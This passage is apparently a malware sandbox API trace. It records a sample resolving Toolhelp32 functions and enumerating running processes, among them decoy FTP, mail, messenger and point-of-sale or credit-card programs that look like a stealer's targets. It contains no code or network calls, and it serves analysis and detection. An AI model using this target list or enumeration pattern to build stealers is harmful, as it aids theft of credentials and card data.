lpProcName="Thread32Next") returned 0x76dc5c3f [0060.510] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0060.510] GetProcAddress (hModule=0x76d30000, lpProcName="Module32Next") returned 0x76dc5dc2 [0060.510] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0060.510] GetProcAddress (hModule=0x76d30000, lpProcName="Module32NextW") returned 0x76d67d96 [0060.510] CreateToolhelp32Snapshot (dwFlags=0x2, 
th32ProcessID=0x0) returned 0x17c [0060.518] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0060.519] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0060.520] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0060.520] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.521] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0060.522] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.523] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, 
szExeFile="winlogon.exe")) returned 1 [0060.523] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0060.524] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0060.525] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0060.526] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.526] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.527] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.528] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.528] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.529] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0060.530] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.530] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.531] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0060.531] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0060.532] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0060.533] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.534] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0060.535] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0060.535] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="avi_attach_midnight.exe")) returned 1 [0060.536] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="packs_foundation_penn.exe")) returned 1 [0060.537] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="similar-kenya-hurt.exe")) returned 1 [0060.537] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="running.exe")) returned 1 [0060.538] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ordinance jelsoft dies.exe")) returned 1 [0060.539] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="introducing_attraction_ranks.exe")) returned 1 [0060.540] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="include-assuming-employers.exe")) returned 1 [0060.540] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operateleetechnologies.exe")) returned 1 [0060.541] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mongolia.exe")) returned 1 [0060.542] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="futurevalleyturned.exe")) returned 1 [0060.542] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: 
lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="besides-tba-comfortable.exe")) returned 1 [0060.543] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extreme-quiz-standard.exe")) returned 1 [0060.543] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sat_ipod.exe")) returned 1 [0060.544] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="well-buttons.exe")) returned 1 [0060.545] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="qty.exe")) returned 1 [0060.545] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="interesting-extends.exe")) returned 1 [0060.546] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fence.exe")) returned 1 [0060.547] Process32Next 
(in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="descending.exe")) returned 1 [0060.547] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="blank.exe")) returned 1 [0060.548] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="algorithms-jefferson.exe")) returned 1 [0060.549] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0060.627] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0060.628] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0060.629] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 
[0060.629] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0060.630] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0060.631] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0060.631] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0060.632] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0060.633] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0060.633] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) 
returned 1 [0060.635] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0060.636] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0060.636] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0060.637] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0060.638] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0060.639] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0060.640] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="outlook.exe")) returned 1 [0060.641] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0060.643] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0060.644] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0060.645] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0060.646] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0060.647] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0060.648] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0060.649] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0060.650] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0060.651] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0060.652] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0060.652] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0060.653] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0060.654] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0060.655] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0060.656] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0060.657] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0060.657] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0060.658] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0060.659] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0060.660] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, 